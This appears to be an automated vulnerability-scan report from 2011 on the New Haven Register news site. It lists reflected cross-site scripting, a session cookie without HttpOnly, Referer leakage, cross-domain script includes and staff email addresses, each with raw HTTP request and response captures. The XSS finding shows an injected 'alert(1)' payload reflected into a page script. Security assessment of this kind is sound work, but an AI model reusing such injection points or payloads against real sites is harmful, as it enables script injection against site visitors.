1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
3. Cross-domain Referer leakage
4. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://www.nhregister.com |
Path: | /articles/2011/06/02/news |
GET /articles/2011/06/02/news Host: www.nhregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: WWW Vary: Accept-Encoding Cache-Control: private, max-age=0, no-cache Content-Type: text/html Date: Fri, 03 Jun 2011 01:39:35 GMT X-TN-ServedBy: newsys.web.80 X-Loop: 1 Keep-Alive: timeout=300, max=5000 Expires: Wed, 26 Feb 1997 08:21:57 GMT X-PHP-Engine: enabled Connection: close Set-Cookie: has_cookies=1 Set-Cookie: PHPSESSID=de476ab985 X-Cache-Info: not cacheable; response specified "Cache-Control: private" Real-Hostname: nhregister.com Content-Length: 57182 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <br" s.prop9="viewmode=286a5b";alert(1)/ s.prop10="" s.prop11="" s.prop12="" s.prop13="" s.prop14="" s.prop15="" s.prop16="" s.prop17="" s.prop18="" s.prop19="" s.prop20="" /* E-commerce Variables */ s.campaign="" s.state="" ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.nhregister.com |
Path: | /articles/2011/06/02/news |
GET /articles/2011/06/02/news Host: www.nhregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: WWW Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Fri, 03 Jun 2011 01:39:26 GMT X-TN-ServedBy: newsys.web.80 X-Loop: 1 Keep-Alive: timeout=300, max=5000 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-PHP-Engine: enabled Connection: close Set-Cookie: has_cookies=1 Set-Cookie: PHPSESSID=a16ea81f57 X-Cache-Info: not cacheable; response specified "Cache-Control: no-store" Real-Hostname: nhregister.com Content-Length: 57857 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.nhregister.com |
Path: | /articles/2011/06/02/news |
GET /articles/2011/06/02/news Host: www.nhregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: WWW Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Fri, 03 Jun 2011 01:48:31 GMT X-TN-ServedBy: newsys.web.80 X-Loop: 1 Keep-Alive: timeout=300, max=5000 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-PHP-Engine: enabled Connection: close Set-Cookie: has_cookies=1 Set-Cookie: PHPSESSID=4cee821714 X-Cache-Info: not cacheable; response specified "Cache-Control: no-store" Real-Hostname: nhregister.com Content-Length: 57851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="http://ajax ...[SNIP]... </script> <script type="text/javascript" src="http://e.yieldm ...[SNIP]... <body> <script type='text/javascript' src='http://stats ...[SNIP]... <a href="/rss/"><img src="http://images ...[SNIP]... <li><a href="http://nhregister ...[SNIP]... <li><a href="https://ctwebcirc ...[SNIP]... <li><a href="http://forms ...[SNIP]... <a href="/"><img src="http://images ...[SNIP]... <li><a href="http://remembe ...[SNIP]... <li><a href="http://forms ...[SNIP]... <li><a href="http://jobs ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://nhregister ...[SNIP]... <li><a href="http://newhave ...[SNIP]... <li><a href="http://fyinewhaven ...[SNIP]... <li><a href="http://fyinewhaven ...[SNIP]... <li><a href="http://newhave ...[SNIP]... <li><a href="http://newhave ...[SNIP]... <div class="searchBoxRight"> <img src="http://images <!-- <span id="yahooWebSearch"> ...[SNIP]... <div class="sc_twitter"> <a href="http://twitter.com ...[SNIP]... <a href="javascript:void </a> ...[SNIP]... <a href="http://www ...[SNIP]... <A HREF="http://www ...[SNIP]... <a href="/rss"><img src="http://images <div class="piece" style="margin-top:2px"> <script type="text/javascript" src="http://w.sharethis ...[SNIP]... <a href="?viewmode=comments" ...[SNIP]... <i> By posting here you agree to abide by our terms and conditions and privacy policy which can be viewed by clicking <a href="http://www ...[SNIP]... <a href="javascript:void </a> ...[SNIP]... <a href="http://www ...[SNIP]... <A HREF="http://www ...[SNIP]... <a href="/rss"><img src="http://images <div class="piece" style="margin-top:2px"> <script type="text/javascript" src="http://w.sharethis ...[SNIP]... <div class="mod_box clear" > <img src="http://images <!--<h3> ...[SNIP]... <div id="hotdeallogo"><a href="http://fyinewhaven ...[SNIP]... <param name="allowscriptaccess" value="always" /><embed src="http://eplayer ...[SNIP]... </div> <iframe src="http://widget ...[SNIP]... <br /> <script src="http://cdn ...[SNIP]... <ul> <script src="http://hosted2.ap ...[SNIP]... <p class="more"><a href="http://hosted2.ap ...[SNIP]... <p class="image"><a href="http://fiscall <h3><a href="http://fiscall ...[SNIP]... <p class="image"><a href="http://hamdenn <h3><a href="http://hamdenn ...[SNIP]... <p class="image"><a href="http://allabou <h3><a href="http://allabou ...[SNIP]... <p class="image"><a href="http://naugatu <h3><a href="http://naugatu ...[SNIP]... <li><a href="http://remembe ...[SNIP]... <h3 style="margin:0"><a href="http://newhave ...[SNIP]... <li><a href="http://jobs ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://nhregister ...[SNIP]... <li class="first"><a href="http://forms ...[SNIP]... <li><a href="https://ctwebcirc ...[SNIP]... <li><a href="http://nhregister ...[SNIP]... <li><a href="http://www ...[SNIP]... <a href="/rss/"><img src="http://images ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li class="last"><a href="http://www ...[SNIP]... </span>, a <a href="http://www ...[SNIP]... </span> <a href="http://www ...[SNIP]... </span> <a href="http://www ...[SNIP]... </span> <a href="http://www ...[SNIP]... <noscript><a href="http://www.omniture src="http://jlnhregi height="1" width="1" border="0" alt="" /> ...[SNIP]... <!-- Begin Newstogram/Daily Me Tracking --> <script type='text/javascript' src='http://static ...[SNIP]... <noscript> <img src="http://b.scorec </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.nhregister.com |
Path: | /articles/2011/06/02/news |
GET /articles/2011/06/02/news Host: www.nhregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: WWW Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Fri, 03 Jun 2011 01:39:26 GMT X-TN-ServedBy: newsys.web.80 X-Loop: 1 Keep-Alive: timeout=300, max=5000 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-PHP-Engine: enabled Connection: close Set-Cookie: has_cookies=1 Set-Cookie: PHPSESSID=a16ea81f57 X-Cache-Info: not cacheable; response specified "Cache-Control: no-store" Real-Hostname: nhregister.com Content-Length: 57857 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="http://ajax ...[SNIP]... </script> <script type="text/javascript" src="http://e.yieldm ...[SNIP]... <body> <script type='text/javascript' src='http://stats ...[SNIP]... </a><script type="text/javascript" src="http://platform ...[SNIP]... <div class="piece" style="margin-top:2px"> <script type="text/javascript" src="http://w.sharethis ...[SNIP]... <div class="piece" style="margin-top:2px"> <script type="text/javascript" src="http://w.sharethis ...[SNIP]... <br /> <script src="http://cdn ...[SNIP]... <ul> <script src="http://hosted2.ap ...[SNIP]... <!-- Begin Newstogram/Daily Me Tracking --> <script type='text/javascript' src='http://static ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.nhregister.com |
Path: | /articles/2011/06/02/news |
GET /articles/2011/06/02/news Host: www.nhregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: WWW Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Fri, 03 Jun 2011 01:39:26 GMT X-TN-ServedBy: newsys.web.80 X-Loop: 1 Keep-Alive: timeout=300, max=5000 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-PHP-Engine: enabled Connection: close Set-Cookie: has_cookies=1 Set-Cookie: PHPSESSID=a16ea81f57 X-Cache-Info: not cacheable; response specified "Cache-Control: no-store" Real-Hostname: nhregister.com Content-Length: 57857 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="mailto:mtuccitto@nhregister.com">mtuccitto@nhregister.com</a> ...[SNIP]... <a href="mailto:mtuccitto@nhregister.com">mtuccitto@nhregister.com</a> ...[SNIP]... <input type="hidden" name="recipient" value="mbrackenbury@nhregister ...[SNIP]... <input type="text" name="from" id="from" value="donotreply@journalre ...[SNIP]... |